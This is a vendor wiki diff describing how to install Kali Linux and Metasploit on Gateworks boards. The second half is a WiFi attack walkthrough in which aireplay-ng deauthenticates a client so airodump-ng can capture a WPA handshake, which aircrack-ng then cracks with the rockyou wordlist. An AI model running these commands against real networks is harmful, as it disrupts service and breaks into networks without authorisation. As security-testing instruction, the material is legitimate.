Changes between Initial Version and Version 1 of Kali

Timestamp:

07/06/2021 11:30:16 PM (3 years ago)

Author:

Cale Collins

Comment:

first draft, no pics

Kali

@@ +1 @@
+= Kali
+
+Offical Kali Linux images are now provided by [https://www.offensive-security.com/category/kali-linux/ Offensive Security] for both Ventana and Newport.  
+
+Build-scripts can be found here:
+
+* [https://gitlab.com/kalilinux/build-scripts/kali-arm/-/blob/master/gateworks-ventana.sh Ventana]
+* [https://gitlab.com/kalilinux/build-scripts/kali-arm/-/blob/master/gateworks-newport.sh Newport]
+* Create your own - [https://www.kali.org/docs/development/kali-linux-arm-chroot/ kali-linux-arm-chroot]
+
+The Ventana prebuilt image can be downloaded from [https://www.kali.org/get-kali/ here], ARM images > Gateworks.  
+
+** Note:  Offical images use Gateworks kernel repos. **  
+
+== What is Kali
+
+Kali Linux (formerly known as !BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. Kali Linux is a multi platform solution, accessible and freely available to information security professionals and hobbyists.
+
+Kali Linux was released on the 13th March 2013 as a complete, top-to-bottom rebuild of !BackTrack Linux, adhering completely to Debian development standards.
+
+Reference: [https://www.kali.org/docs/introduction/what-is-kali-linux/]
+
+= Kali on Gateworks
+
+Official instructions: 
+
+* [https://www.kali.org/docs/arm/gateworks-ventana/ Official Page]
+
+The following instructions can be used on Ventana or Newport family boards.
+
+Requirements:
+* 16GB SD card or larger (Class 10 recommended)
+* Gateworks SBC Ventana or Newport
+* Linux Desktop Workstation
+* Wireless radio capable of packet injection ([wiki:/wireless/wifi#Wifi-6 Alfa AWPCIE-AX200U] recommended)
+* Antennas 
+
+
+== Installing Kali to an SD card
+
+Insert SD card into Linux workstation, then use"dmesg" to check the device name udev has assigned, for example "/dev/sdb".  
+
+Some operating systems will auto-mount block storage devices, the partitions must be unmounted in order to write directly to the volume:
+{{{#!bash
+umount /dev/sdb?
+}}}
+
+Write image to SD card:
+
+{{{#!bash
+xzcat kali-linux-1-newport.img.xz |sudo dd of=/dev/sdb bs=4M status=progress
+}}}
+
+The card is now imaged with Kali.  Because the partitions have already been unmounted, simply remove the card.  
+
+
+== Booting the SD card
+
+To boot from the SD card reader on the Gateworks "boot_targets", or "bootdevs" need to be set so the SD card has priority over the flash.  
+
+Break out in the bootloader:
+
+For Newport:
+{{{
+GW6204-B> setenv boot_targets mmc1 mmc0 usb0 scsi0
+GW6204-B> saveenv
+}}}
+
+For Ventana:
+{{{
+Ventana > setenv bootdevs mmc
+Ventana > print bootdevs     
+bootdevs=mmc
+Ventana > saveenv
+Saving Environment to NAND...
+Erasing NAND...
+Erasing at 0x1000000 -- 100% complete.
+Writing to NAND... OK
+Ventana > 
+}}}
+
+Reboot the SBC.
+
+Once Kali is loaded login, username "kali", password "kali".
+
+Verify that your network interfaces are available:
+
+{{{#!bash
+ls /sys/class/net
+}}}
+
+Check your radio is capable of working on the channels that will be exploited:
+{{{#!bash
+iw phy phy0 channels
+}}}
+= Install Metasploit Framework
+
+Metasploit framework is an open source tool which can be used to probe systematic vulnerabilities on networks and servers.
+
+Metasplot features:
+* Command shell payloads that enable users to run scripts or random commands against a host
+* Dynamic payloads that allow testers to generate unique payloads to evade antivirus software
+* Meterpreter payloads that allow users to commandeer device monitors using VMC and to take over sessions or upload and download files
+* Static payloads that enable port forwarding and communications between networks
+
+Offensive-Security offers a free online course for learning Metasploit: [https://www.offensive-security.com/metasploit-unleashed/]
+
+To install Metasploit on Gateworks:
+
+1. Update your system
+{{{#!bash 
+apt-get update 
+}}}
+1. Install curl
+{{{#!bash
+sudo apt-get install curl -y 
+}}}
+1. Download and install Metasploit
+{{{#!bash
+curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
+  chmod 755 msfinstall && \
+  ./msfinstall
+}}}
+
+= Aircrack-ng
+
+Aircrack-ng is a complete suite of tools to assess !WiFi network security.
+
+It focuses on different areas of !WiFi security:
+* Monitoring: Packet capture and export of data to text files for further processing by third party tools
+* Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
+* Testing: Checking !WiFi cards and driver capabilities (capture and injection)
+* Cracking: WEP and WPA PSK (WPA 1 and 2)
+
+Reference: [https://www.aircrack-ng.org/]
+
+For deauthentication the wifi adapter will need to be capable of packet injection.  
+
+To test if packet injection is available:
+{{{#!bash
+sudo aireplay-ng --test wlan0mon
+}}}
+
+== Capturing packets
+
+In order to capture packets airmon-ng is used to create a monitor interface.  
+
+To begin connect to the board using SSH (this is important later).
+
+Kill processes that may interfere with airmon-ng:
+{{{#!bash
+sudo airmon-ng check kill
+}}}
+Start the monitor interface:
+{{{#!bash
+sudo airmon-ng start wlan0 #this command creates the "mon" interface "wlan0mon".
+}}}
+Kick off airodump-ng to start capturing packets. Note, airodump-ng by default will only monitor on 2.4Ghz, use the "--band a" switch to enable 5ghz monitoring.  
+{{{#!bash
+sudo airodump-ng --band a wlan0mon
+}}}
+
+== Hacking the Gibson
+
+Once the target SSID has been identified record its MAC address, also note which channel it's on.  
+
+Single out that network to find clients which can be deauthenticated.  In this example my BSSID is {{{11:22:33:44:55:66}}} on channel 44.  We will create a log file to record the handshake called "my-handshake".
+{{{#!bash
+sudo airodump-ng -c44 --write my-handshake --bssid 11:22:33:44:55:66 wlan0mon
+}}}
+Run this scan until a client is identified.  For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}.
+
+Start a new SSH session, so both sessions are open simultaneously.  
+
+In the second session execute your deauthentication attack (this is where packet injection is used):
+{{{#!bash
+sudo aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0mon
+}}}
+Upon sucess the client is disconnected from the access point.  When the client reconnects airodump-ng will capture the handshake and log it to the designated file.  
+
+=== Wordlists and Aircrack-ng
+
+Wordlists with default manufacturer passwords are provided by Metasploit framework.  More wordlists can be found in "/usr/share/wordlists".  A wordlist is only one potential approach to breaking the handshake hash.  Because it is the most simple we will use this method in the following example.  
+
+An all around basic wordlist included with Kali is rockyou.txt.
+{{{#!bash
+sudo gunzip /usr/share/wordlists/rockyou.txt.gz #extract the wordlist
+cat /usr/share/wordlists/rockyou.txt #display words contained in the list
+}}}
+Kick off aircrack-ng to decrypt the hash:
+{{{
+aircrack-ng my-handshake-01.cap -w /usr/share/wordlists/rockyou.txt 
+}}}
+
+= Getting help with Kali
+
+Please direct all Kali Linux related questions to the forums:
+
+https://forums.kali.org/
+
+Feel welcome to contact !support@gateworks.com for questions specific to Gateworks. 
+
+ 
+